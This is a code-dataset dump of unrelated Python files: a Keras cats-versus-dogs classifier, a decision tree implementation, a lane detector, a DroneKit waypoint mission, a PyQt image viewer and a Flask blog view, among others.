__init__(self, input_size, hidden_size, otput_size, weight_init_std=0.01):\n self.params = {}\n self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)\n self.params['b1'] = np.zeros(hidden_size)\n self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)\n self.params['b2'] = np.zeros(output_size)\n\n self.layers = OrderedDict()\n self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])\n self.layers['Relu1'] = Relu()\n self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])\n\n self.lastLayer = SoftmaxWithLoss()\n\n def predict(self, x):\n for layer in self.layers.values():\n x = layer.forward(x)\n\n return x\n \n def loss(self, x, t):\n y = self.predict(x)\n return self.lastLayer.forward(y, t)\n\n def accuracy(self, x, t):\n y = self.predict(x)\n y = np.argmax(y, axis=1)\n if t.ndim != 1: t = np.argmax(t, axis=1)\n accuracy = np.sum(y == t) / float(x.shape[0])\n return accuracy\n \n","sub_path":"deep_learning/backpropagate.py","file_name":"backpropagate.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599031936","text":"from keras import layers\nfrom keras import models\nfrom keras import optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\nimport os, shutil\nimport matplotlib.pyplot as plt\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nimport tensorflow as tf\n\n# 元のデータセットを展開したディレクトリへのパス\noriginal_dataset_dir = '/home/makoto/work/shake/DLwithPython/chapter5/dataset/train'\n\n# より小さなデータセットを格納するディレクトリへのパス\nbase_dir = '/home/makoto/work/shake/DLwithPython/chapter5/dataset_small'\nif not os.path.exists(base_dir):\n os.mkdir(base_dir)\n\n\n# 訓練データセット、検証データセット、テストデータセットを配置するディレクトリ\ntrain_dir = os.path.join(base_dir, 'train')\nif not os.path.exists(train_dir):\n os.mkdir(train_dir)\n\nvalidation_dir = os.path.join(base_dir, 'validation')\nif not os.path.exists(validation_dir):\n 
os.mkdir(validation_dir)\n\ntest_dir = os.path.join(base_dir, 'test')\nif not os.path.exists(test_dir):\n os.mkdir(test_dir)\n\n# 訓練用の猫の画像を配置するディレクトリ\ntrain_cats_dir = os.path.join(train_dir, 'cats')\nif not os.path.exists(train_cats_dir):\n os.mkdir(train_cats_dir)\n\n# 訓練用の犬の画像を配置するディレクトリ\ntrain_dogs_dir = os.path.join(train_dir, 'dogs')\nif not os.path.exists(train_dogs_dir):\n os.mkdir(train_dogs_dir)\n\n# 検証用の猫の画像を配置するディレクトリ\nvalidation_cats_dir = os.path.join(validation_dir, 'cats')\nif not os.path.exists(validation_cats_dir):\n os.mkdir(validation_cats_dir)\n\n# 検証用の犬の画像を配置するディレクトリ\nvalidation_dogs_dir = os.path.join(validation_dir, 'dogs')\nif not os.path.exists(validation_dogs_dir):\n os.mkdir(validation_dogs_dir)\n\n# テスト用の猫の画像を配置するディレクトリ\ntest_cats_dir = os.path.join(test_dir, 'cats')\nif not os.path.exists(test_cats_dir):\n os.mkdir(test_cats_dir)\n\n# テスト用の犬の画像を配置するディレクトリ\ntest_dogs_dir = os.path.join(test_dir, 'dogs')\nif not os.path.exists(test_dogs_dir):\n os.mkdir(test_dogs_dir)\n\n# 最初の1,000個の猫画像をtrain_cats_dirにコピー\nfnames = ['cat.{}.jpg'.format(i) for i in range(1000)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(train_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n# 次の500個の猫画像をvalidation_cats_dirにコピー\nfnames = ['cat.{}.jpg'.format(i) for i in range(1000, 1500)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(validation_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n# 次の500個の猫画像をtest_cats_dirにコピー\nfnames = ['cat.{}.jpg'.format(i) for i in range(1500, 2000)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(test_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n\n# 最初の1,000個の犬画像をtrain_dogs_dirにコピー\nfnames = ['dog.{}.jpg'.format(i) for i in range(1000)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(train_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n# 
次の500個の犬画像をvalidation_dogs_dirにコピー\nfnames = ['dog.{}.jpg'.format(i) for i in range(1000, 1500)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(validation_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n# 次の500個の犬画像をtest_dogs_dirにコピー\nfnames = ['dog.{}.jpg'.format(i) for i in range(1500, 2000)]\nfor fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(test_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n\n\nmodel = models.Sequential()\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(128, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(128, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(512, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\n\nmodel.summary()\n\nmodel.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4), metrics=['acc'])\n\n# すべての画像を1/255でスケーリング\ntrain_datagen = ImageDataGenerator(rescale=1./255)\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_dir, # ターゲットディレクトリ\n target_size=(150, 150), # すべての画像サイズを150x150に変更\n batch_size=20, # バッチサイズ\n class_mode='binary' # binary_crossentropyを使用するため二値のラベルが必要\n )\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_dir,\n target_size=(150, 150),\n batch_size=20,\n class_mode='binary'\n )\n\nhistory = model.fit_generator(\n train_generator,\n steps_per_epoch=100,\n epochs=30,\n validation_data=validation_generator,\n validation_steps=50\n )\n\nmodel.save('cats_and_dogs_small_1.h5')\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = 
history.history['val_loss']\n\nepochs = range(1, len(acc) + 1)\n\n# 正解率をプロット\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\n\nplt.figure()\n\n# 損失値をプロット\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\n\nplt.show()\n","sub_path":"chapter5/2-2_Dog_vs_Cat_Network.py","file_name":"2-2_Dog_vs_Cat_Network.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"516560543","text":" \ns = \"\"\nnum = 0 # 计算不重复三位数的个数\nfor i in range(1,5): # 百位数迭代 1 到 5 之间的数字,不包括5\n s += str(i) # 百位数\n for j in range(1,5): # 十位数迭代1到5之间的数字,不包括5\n if(i != j): # 百位与十位不相等时\n s += str(j)\n for k in range(1,5):\n if(j != k and len(s) == 2 and k != i): # 十位个位不相等,百位十位都有数字,个位百位不相等时\n s += str(k)\n print(s) # 打印该三位数\n s = str(i) + str(j) # 还原百位十位\n num += 1 # 三位数个数加一\n s = str(i) # 还原百位\n s = \"\" # 字符串置空\nprint(num) # 打印三位数的总个数\n\n\n'''\n总结:\n1.range函数的区间是左闭右开区间\n2.python严格区分缩进符号 统一用tab或者空格 不得混用\n3.str()函数将其他类型转换为字符串类型 len()函数计算字符串长度\n'''\n","sub_path":"Python100/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281543264","text":"from threading import Thread\nfrom subprocess import call\nfrom Classes.MathsQuiz import MathsQuiz\nfrom Classes.Mongo import Mongo\n\n\nclass App(object):\n\n def __init__(self):\n self.userInput = 0\n self.uniqueID = 0\n self.studentName = 0\n self.studentScore = 0\n self.mongo = 0\n self.mongod_startup()\n\n def mongod_startup(self):\n mongod_startup = Thread(target=lambda: call(\"mongodb_startup.bat\"))\n mongod_startup.start()\n\n def option_listing(self):\n print(\"Please choose one of the options below.\\n\\n\"\n \"If 
you would like to use the Maths Quiz, type '1'\\n\"\n \"If you would like to read existing records, type '2'\\n\"\n \"If you would like to read all existing records, type '3'\\n\"\n \"If you would like to modify existing records, type '4'\\n\"\n \"If you would like to delete existing records, type '5'\\n\"\n \"If you would like to delete the entire database, type '6'\\n\"\n \"If you would like to exit the program, type '7'\\n\"\n )\n self.userInput = str(input(\"Please choose one of the listed options: \"))\n if self.userInput == \"1\":\n self.start_maths_quiz()\n self.option_listing()\n\n elif self.userInput == \"2\":\n self.uniqueID = str(input(\"What is your uniqueID: \"))\n self.define_mongo()\n self.mongo.read_from_database()\n self.option_listing()\n\n elif self.userInput == \"3\":\n self.define_mongo()\n self.mongo.list_all_records()\n self.option_listing()\n\n elif self.userInput == \"4\":\n self.uniqueID = str(input(\"What is your uniqueID: \"))\n self.studentScore = int(input(\"What is your score? \"))\n self.define_mongo()\n self.mongo.overwrite_score_from_database()\n self.option_listing()\n\n elif self.userInput == \"5\":\n self.uniqueID = str(input(\"What is your uniqueID: \"))\n self.define_mongo()\n self.mongo.delete_from_database()\n self.option_listing()\n\n elif self.userInput == \"6\":\n self.define_mongo()\n self.mongo.delete_entire_database()\n self.option_listing()\n\n elif self.userInput == \"7\":\n pass\n\n else:\n print(\"Thats an invalid input, please try again.\")\n self.option_listing()\n\n def define_mongo(self):\n self.mongo = Mongo(self.uniqueID, self.studentName, self.studentScore)\n\n def start_maths_quiz(self):\n print(\n \"In this basic Maths Quiz,\"\n \"You'll answer each question,\"\n \"& at the end you will get a score,\"\n \"which will be stored on a database.\\n\\n\"\n )\n while True:\n quizOrQuit = input(\n \"Do you wish to participate? 
(Y/N)\"\n ).lower()\n if quizOrQuit not in \"yesno\":\n print(\n \"Not a valid input.\"\n )\n else:\n break\n if quizOrQuit in \"yes\":\n MathsQuiz()\n else:\n pass\n\n\ntest = App()\ntest.option_listing()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"131145856","text":"import numpy as np\n\ndef entropy(col):\n _, cnts = np.unique(col, return_counts=True)\n cnts = np.array(cnts)/len(col)\n cnts[cnts!=0] = cnts[cnts!=0]*np.log2(cnts[cnts!=0])\n return -np.sum(cnts)\n\n# For ID3\ndef calcInforGain(col_x, col_y):\n HD = entropy(col_y)\n HDA = 0\n unique = np.unique(col_x)\n for key in unique:\n HDA += entropy(col_y[col_x == key])\n return HD - HDA, unique\n\n# For C4.5\ndef calcInforGainRatio(col_x, col_y):\n HD = entropy(col_y)\n HDA = 0\n unique = np.unique(col_x)\n for key in unique:\n HDA += entropy(col_y[col_x == key])\n return (HD - HDA)/entropy(col_x), unique\n \n# For CART\ndef Gini(col):\n unique, cnts = np.unique(col, return_counts=True)\n cnts = np.array(cnts)/len(col)\n return 1 - np.sum(cnts ** 2)\n \ndef findMinGini(col_x, col_y):\n unique, cnts = np.unique(col_x, return_counts=True)\n cnts = dict(zip(unique, cnts))\n min_gini = 1\n min_key = None\n for key, cnt in cnts.items():\n gini = cnt/len(col_y)*Gini(col_y[col_x == key]) + (1-cnt/len(col_y))*Gini(col_y[col_x != key])\n if gini < min_gini:\n min_gini = gini\n min_key = key\n return min_gini, min_key\n \nclass Node:\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.children = []\n \n def __str__(self, indent=0):\n ans = \"\"\n if not self.children:\n ans = str(self.key) + \": \" + str(self.val) + \"\"\n else:\n ans += str(self.key) + \": \" + str(self.val) + \"(\"\n for child in self.children:\n ans += str(child) + \", \"\n ans += \")\"\n return ans\n \n def addChild(self, key, val):\n self.children.append(Node(key, val))\n return 
self.children[-1]\n \nclass DecisionTree:\n def __init__(self, epsilon=0):\n self.root = Node(\"root\", 0)\n self.epsilon = epsilon\n self.type = None\n \n def fit(self, x, y, type=\"CART\", detailed=False):\n self.type = type\n if type == \"CART\":\n self.CARTgenerate(x, y, self.root, detailed)\n else:\n self.generate(x, y, self.root, type, detailed)\n \n def generate(self, x, y, root, detailed):\n # if empty\n if x.size == 0:\n return\n # if all left are the same kind\n if np.all(y == True) or np.all(y == False):\n root.addChild(\"leaf\", y[0])\n return\n # if all the feature are the same, use the popular one\n if np.all(x == x[0,:]):\n unique, cnts = np.unique(y, return_counts=True)\n cnts = dict(zip(unique, cnts))\n root.addChild(\"leaf\", cnts[True] > cnts[False])\n return \n \n max_gain = 0\n max_feature = -1\n max_feature_vals = None\n \n for i in range(x.shape[-1]):\n if type==\"ID3\":\n gain, feature_vals = calcInforGain(x[:, i], y)\n elif type==\"C4.5\":\n gain, feature_vals = calcInforGainRatio(x[:, i], y)\n if gain > max_gain:\n max_gain = gain\n max_feature = i\n max_feature_vals = feature_vals\n if max_gain < self.epsilon:\n return\n else:\n for val in max_feature_vals:\n child = root.addChild(max_feature, val)\n self.generate(np.delete(x[x[:, max_feature]==val], max_feature, axis=-1), y[x[:, max_feature]==val], child, type, detailed)\n \n def CARTgenerate(self, x, y, root, detailed, min_gini_old=1):\n # if empty\n if x.size == 0:\n return\n # if all left are the same kind\n if np.all(y == True) or np.all(y == False):\n root.addChild(\"leaf\", y[0])\n return\n # if all the feature are the same, use the popular one\n if np.all(x == x[0,:]):\n unique, cnts = np.unique(y, return_counts=True)\n cnts = dict(zip(unique, cnts))\n root.addChild(\"leaf\", cnts[True] > cnts[False])\n return \n \n min_gini = 1\n min_feature = None\n min_feature_val = None\n for i in range(x.shape[-1]):\n gini, feature_val = findMinGini(x[:, i], y)\n if detailed:\n print(gini, 
feature_val, i)\n if gini < min_gini:\n min_gini = gini\n min_feature = i\n min_feature_val = feature_val\n if abs(min_gini - min_gini_old) < 1e-6: # all feature are random\n unique, cnts = np.unique(y, return_counts=True)\n cnts = dict(zip(unique, cnts))\n root.addChild(\"leaf\", cnts[True] > cnts[False])\n return\n \n child_true = root.addChild((min_feature, min_feature_val,), True)\n self.CARTgenerate(x[x[:, min_feature]==min_feature_val], y[x[:, min_feature]==min_feature_val], child_true, detailed, min_gini)\n child_false = root.addChild((min_feature, min_feature_val,), False)\n self.CARTgenerate(x[x[:, min_feature]!=min_feature_val], y[x[:, min_feature]!=min_feature_val], child_false, detailed, min_gini)\n \n # TODO: find nice regularization function\n def pruning(self, root):\n pass\n \n def predict(self, x):\n assert(len(self.root.children) > 0)\n if len(x.shape) == 1:\n tmp = self.root\n if self.type == 'CART':\n while len(tmp.children) > 1:\n feature = tmp.children[0].key[0]\n if x[feature] == tmp.children[0].key[1]:\n tmp = tmp.children[0]\n else:\n tmp = tmp.children[1]\n if len(tmp.children) == 1 and tmp.children[0].key == 'leaf':\n return tmp.children[0].val\n else:\n while len(tmp.children) > 1:\n feature = tmp.children[0].key\n if x[feature] == tmp.children[0].val:\n tmp = tmp.children[0]\n else:\n tmp = tmp.children[1]\n if len(tmp.children) == 1 and tmp.children[0].key == 'leaf':\n return tmp.children[0].val\n else:\n assert(len(x.shape) == 2)\n ans = []\n for test in x:\n ans.append(self.predict(test))\n return ans","sub_path":"np_ml/random_forest/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"484441095","text":"import glob\n\nimport cv2\nimport numpy as np\nimport peakutils\n\nimport util\nfrom binary_threshold import combined_threshold\nfrom lane import Lane\nfrom line import Left, Right\nfrom 
perspective_transform import warp\nfrom undistort_image import undistort\n\nMASK_WIDTH = int(1280 / 20)\nMINIMUM_DISTANCE = 0\nTHRESHOLD = 0.0\nWINDOW_COUNT = 9\nX_METERS_PER_PIXEL = 3.67 / 820 # lane width ~ 3.67m, see: https://goo.gl/lzsRjT\nY_METERS_PER_PIXEL = 3.67 / 120 # lane marking lenght ~ 3.67m, see: https://goo.gl/D3OgRP\n\n\ndef annotate(image, lane):\n annotated = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)\n\n lane.left_line.draw_line(annotated)\n lane.right_line.draw_line(annotated)\n\n lane.left_line.draw_points(annotated)\n lane.right_line.draw_points(annotated)\n\n return annotated\n\n\nleft_line = None\nright_line = None\n\n\ndef apply_mask(image, mask_width=MASK_WIDTH):\n if left_line is None or right_line is None:\n return image\n\n mask = cv2.bitwise_or(left_line.get_mask(mask_width), right_line.get_mask(mask_width))\n return cv2.bitwise_and(image, (255), mask=mask)\n\n\ndef find_lane(image: np.ndarray, minimum_distance=MINIMUM_DISTANCE, smooth=False, threshold=THRESHOLD, use_mask=False):\n global left_line\n global right_line\n\n image_height, image_width = image.shape\n window_height = int(image_height / WINDOW_COUNT)\n image_center = int(image_width / 2)\n\n if use_mask:\n image = apply_mask(image)\n else:\n left_line = None\n right_line = None\n\n left_points, right_points = [], []\n\n for y1 in np.arange(image_height, 0, -window_height):\n y0 = y1 - window_height\n window = image[y0:y1, :]\n\n # find peaks using PeakUtils (http://pythonhosted.org/PeakUtils/)\n sum = np.sum(window, axis=0, dtype=np.float)\n if sum.max() > 0.0:\n sum -= peakutils.baseline(sum, deg=8)\n peak = peakutils.indexes(sum, thres=threshold, min_dist=minimum_distance)\n\n # sort left/right\n y = int((y0 + y1) / 2)\n for x in peak:\n if x <= image_center:\n left_points.append((y, x))\n else:\n right_points.append((y, x))\n\n left_line = Left(left_points, image_height, image_width, Y_METERS_PER_PIXEL, X_METERS_PER_PIXEL, smooth)\n right_line = Right(right_points, 
image_height, image_width, Y_METERS_PER_PIXEL, X_METERS_PER_PIXEL, smooth)\n\n lane = Lane(left_line, right_line, image)\n\n return lane\n\n\nif __name__ == '__main__':\n test_images = glob.glob('../test_images/*.jpg')\n output_images = []\n\n for test_image in test_images:\n image = cv2.imread(test_image)\n\n undistorted = undistort(image)\n warped = warp(undistorted, borderMode=cv2.BORDER_REFLECT)\n binary = combined_threshold(warped)\n\n lane = find_lane(binary, minimum_distance=640, threshold=0.1, use_mask=False)\n annotated = annotate(binary, lane=lane)\n\n output_images.append(warped)\n output_images.append(annotated)\n\n collage = util.collage(output_images, len(test_images), 2)\n cv2.imwrite('../output_images/lane_finder.png', collage)\n","sub_path":"scripts/lane_finder.py","file_name":"lane_finder.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"169928148","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 3 17:36:19 2019\n\n@author: Usuario\n\"\"\"\nfrom pathlib import Path\ndatafolder=Path(\"C:/Users/Nataly/Documents/Trabajo-de-grado_Artefactos/balanceoRE/txt\")\nimport sys\nsys.path.insert(1,'C:/Users/Nataly/Documents/Trabajo-de-grado_Artefactos/funciones')\nfrom yolovoc import yolo2voc\nfrom readboxes import read_boxes\nfrom rOI import ROI\nfrom ventaneo import ventaneoo\n\n\nimport cv2\nimport numpy as np\nimport glob\n\nfrom matplotlib import pyplot as plt\n\n\n \nfor image in glob.glob('*.jpg'):\n # image = '00002.jpg'\n im = cv2.imread(image)\n aa,bb,c = im.shape \n imaROI=ROI(im)\n imaROI=cv2.normalize(imaROI, None, 0, 1, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC3)\n \n #cv2.imshow('Grays',imaROI)\n #cv2.destroyAllWindows()\n for z in range(c):\n im[:,:,z]=im[:,:,z]*imaROI\n \n _,contours,_= cv2.findContours(imaROI,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\n areas = [cv2.contourArea(c) for c in contours]\n max_index = np.argmax(areas)\n 
cnt=contours[max_index]\n x,y,w,h = cv2.boundingRect(cnt)\n a,b,ch = im[y:y+h,x:x+w].shape\n im=im[y:y+h,x:x+w]\n# tamañoA=50\n# tamañoB=50\n# re=0\n# for f in range(0,a-tamañoA,tamañoA):\n# for c in range(0,b-tamañoB,tamañoB):\n# cropped=ventaneoo(tamañoA, tamañoB,a,b,f,c, im)\n# dire='C:/Users/Nataly/Documents/Trabajo-de-grado_Artefactos/balanceoDM/50x50/NO/1/'+image[0:len(image)-3]+'-'+str(re)+'.jpg'\n# cv2.imwrite(dire,cropped)\n# re=re+1\n# tamañoaA=150\n# tamañoaB=150\n# rea=0\n# for fa in range(0,a-tamañoaA,tamañoaA):\n# for ca in range(0,b-tamañoaB,tamañoaB):\n# croppeda=ventaneoo(tamañoaA, tamañoaB,a,b,fa,ca, im)\n# dire='C:/Users/Nataly/Documents/Trabajo-de-grado_Artefactos/balanceoDM/150x150/NO/1/'+image[0:len(image)-3]+'-'+str(rea)+'.jpg'\n# cv2.imwrite(dire,croppeda)\n# rea=rea+1\n tamañoa1A=300\n tamañoa1B=300\n rea1=0\n for fa1 in range(0,a-tamañoa1A,tamañoa1A):\n for ca1 in range(0,b-tamañoa1B,tamañoa1B):\n croppeda1=ventaneoo(tamañoa1A, tamañoa1B,a,b,fa1,ca1, im)\n dire='C:/Users/Nataly/Documents/Trabajo-de-grado_Artefactos/balanceoDM/500x500/NO/8/'+image[0:len(image)-3]+'-'+str(rea1)+'.jpg'\n cv2.imwrite(dire,croppeda1)\n rea1=rea1+1\n print(image)","sub_path":"balanceoDM/NO/8/cutNoRE.py","file_name":"cutNoRE.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259649427","text":"from dronekit import connect, VehicleMode, LocationGlobalRelative\r\nimport time\r\n\r\n#connecting to vehicle\r\nimport argparse\r\nparser = argparse.ArgumentParser(description='commands')\r\nparser.add_argument('--connect')\r\nargs = parser.parse_args()\r\n\r\nconnection_string = args.connect\r\n\r\nprint('Connection to the Vehicle on %s'%connection_string)\r\nvehicle = connect(connection_string,wait_ready = True,heartbeat_timeout=180)\r\n\r\n#functions\r\ndef arm_and_takeoff(tgt_altitude):\r\n\tprint('Arming')\r\n\r\n\twhile not vehicle.is_armable:\r\n\t\tprint('Arm 
failed')\r\n\t\ttime.sleep(1)\r\n\r\n\tvehicle.mode = VehicleMode('GUIDED')\r\n\tvehicle.armed = True\r\n\r\n\tvehicle.simple_takeoff(tgt_altitude)\r\n\tprint('TAKEOFF')\r\n\r\n\t#wait for reaching the target altitude\r\n\twhile True:\r\n\t\taltitude = vehicle.location.global_relative_frame.alt\r\n\r\n\t\tif altitude >= tgt_altitude -1:\r\n\t\t\tprint('Target Altitude Reached')\r\n\t\t\tbreak\r\n\ttime.sleep(1)\r\n\r\n\r\n#MAIN MISSION\r\narm_and_takeoff(15)\r\n\r\n#SPEED\r\nvehicle.airspeed = 10\r\n\r\n#WAYPOINT #1\r\nprint('going to waypoint #1')\r\nwp1 = LocationGlobalRelative(38.733478, -121.211845, 15)\r\nvehicle.simple_goto(wp1)\r\n\r\n#TRAVEL\r\ntime.sleep(30)\r\n\r\n#RETURN\r\nprint('RTL')\r\nvehicle.mode = VehicleMode('RTL')\r\n\r\n#TRAVEL\r\ntime.sleep(25)\r\n\r\n#CLOSE CONNECTION\r\nvehicle.close()\r\n","sub_path":"mission1.py","file_name":"mission1.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"651823611","text":"#!/usr/bin/python2.7\n#\n# Copyright 2010 Google Inc. 
All Rights Reserved.\n\n\"\"\"Unittest for text_query.py module.\"\"\"\n\n__author__ = 'eyalf@google.com (Eyal Fink)'\n\nfrom google.appengine.ext import db\nimport text_query\nimport unittest\n\n\nclass TextQueryTests(unittest.TestCase):\n def test_normalize(self):\n assert text_query.normalize(u'hi there') == u'HI THERE'\n assert text_query.normalize(u'salut l\\xe0') == u'SALUT LA'\n assert text_query.normalize(\n u'L\\xf2ng Str\\xefng w\\xedth l\\xf4ts \\xf6f \\xc3cc\\xebnts') == \\\n u'LONG STRING WITH LOTS OF ACCENTS'\n\n def test_cjk_separation(self):\n q = text_query.TextQuery(u'\\u4f59\\u5609\\u5e73')\n assert [u'\\u4f59', u'\\u5609', u'\\u5e73'] == q.words\n assert q.words == q.query_words\n q = text_query.TextQuery(u'foo\\u4f59\\u5609bar\\u5e73')\n assert q.words == ['FOO', u'\\u4f59', u'\\u5609', 'BAR', u'\\u5e73']\n assert q.words == q.query_words\n \n def test_parsing(self):\n q = text_query.TextQuery('abcd e fghij')\n assert ['ABCD', 'E', 'FGHIJ'] == q.words\n assert q.words == q.query_words\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_text_query.py","file_name":"test_text_query.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610995985","text":"\n\nfrom xai.brain.wordbase.nouns._benefit import _BENEFIT\n\n#calss header\nclass _BENEFITTING(_BENEFIT, ):\n\tdef __init__(self,): \n\t\t_BENEFIT.__init__(self)\n\t\tself.name = \"BENEFITTING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"benefit\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_benefitting.py","file_name":"_benefitting.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"625949243","text":"from PyQt5.QtWidgets import QApplication, QWidget,QPushButton, QLineEdit,QLabel\r\nfrom PyQt5.QtGui import QPixmap\r\nimport sys\r\n\r\nclass Example(QWidget):\r\n 
def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.setGeometry(100, 100, 1000, 900)\r\n self.setWindowTitle('15_2')\r\n\r\n self.btn = QPushButton('Вывести картинку', self)\r\n self.btn.move(20, 20)\r\n self.btn.clicked.connect(self.run)\r\n\r\n self.file_name = QLineEdit(self)\r\n self.file_name.move(150, 20)\r\n\r\n self.pixmap = QPixmap()\r\n self.image = QLabel(self)\r\n self.image.move(80,60)\r\n self.image.resize(950,750)\r\n self.image.setPixmap(self.pixmap)\r\n\r\n\r\n\r\n def run(self):\r\n self.pixmap.load(self.file_name.text())\r\n self.image.setPixmap(self.pixmap)\r\n\r\n self.image.resize(self.pixmap.width(),self.pixmap.height())\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n ex.show()\r\n sys.exit(app.exec())","sub_path":"15_2.py","file_name":"15_2.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"376937498","text":"from flask import render_template\r\nfrom sqlalchemy import func\r\n\r\nfrom main import app\r\nfrom models import db, User, Post, Tag, Comment, posts_tags\r\nfrom flask_wtf import Form\r\nfrom wtforms import StringField, TextField\r\nfrom wtforms.validators import DataRequired, Length\r\n\r\ndef sidebar_data():\r\n \"\"\"Set the sidebar function.\"\"\"\r\n\r\n # Get post of recent\r\n recent = db.session.query(Post).order_by(\r\n Post.publish_date.desc()\r\n ).limit(5).all()\r\n\r\n # Get the tags and sort by count of posts.\r\n top_tags = db.session.query(\r\n Tag, func.count(posts_tags.c.post_id).label('total')\r\n ).join(\r\n posts_tags\r\n ).group_by(Tag).order_by('total DESC').limit(5).all()\r\n return recent, top_tags\r\n\r\n\r\n\r\n@app.route('/')\r\n@app.route('/')\r\ndef home(page=1):\r\n \"\"\"View function for home page\"\"\"\r\n\r\n posts = Post.query.order_by(\r\n Post.publish_date.desc()\r\n ).paginate(page, 10)\r\n\r\n recent, top_tags = 
sidebar_data()\r\n\r\n return render_template('home.html',\r\n posts=posts,\r\n recent=recent,\r\n top_tags=top_tags)\r\n\r\nclass CommentForm(Form):\r\n \"\"\"Form vaildator for comment.\"\"\"\r\n\r\n # Set some field(InputBox) for enter the data.\r\n # patam validators: setup list of validators\r\n name = StringField(\r\n 'Name',\r\n validators=[DataRequired(), Length(max=255)])\r\n\r\n text = TextField(u'Comment', validators=[DataRequired()])\r\n# WTF 的基础使用\r\n# WTForms 由 字段、检验器、表单 三部分组成: \r\n# 字段:表示表单的输入框,会做一些初步的输入检查 \r\n# 检验器:是一组被附加到字段(输入框)上的函数,用于对输入数据的检验,确保输入我们期望的数据 \r\n# 表单:是一个 Python 类,其中包含了 字段(类属性) 和 检验器,在接收到 HTTP POST 请求时,会根据定义的检验器规则来对输入数据进行检验\r\n\r\n# NOTE 1:表单类需要继承 Flask WTF 扩展提供的 Form 类 \r\n# NOTE 2:表单类中的一个类属性,就代表了一个字段,即输入框。wtforms 提供了多种类型的字段类 \r\n# NOTE 3:字段类的第一个参数为输入框标题,第二个参数为绑定到该字段的检验器列表,由 wtforms.validators 提供\r\n\r\n\r\n@app.route('/post/', methods=('GET', 'POST'))\r\ndef post(post_id):\r\n \"\"\"View function for post page\"\"\"\r\n # form.validata_on_submit() 方法会隐式的判断该 HTTP 请求是不是 POST, 若是, 则将请求中提交的表单数据对象传入上述的 form 对象并进行数据检验.\r\n\r\n # 若提交的表单数据对象通过了 form 对象的检验, 则 form.validata_on_submit() 返回为 True 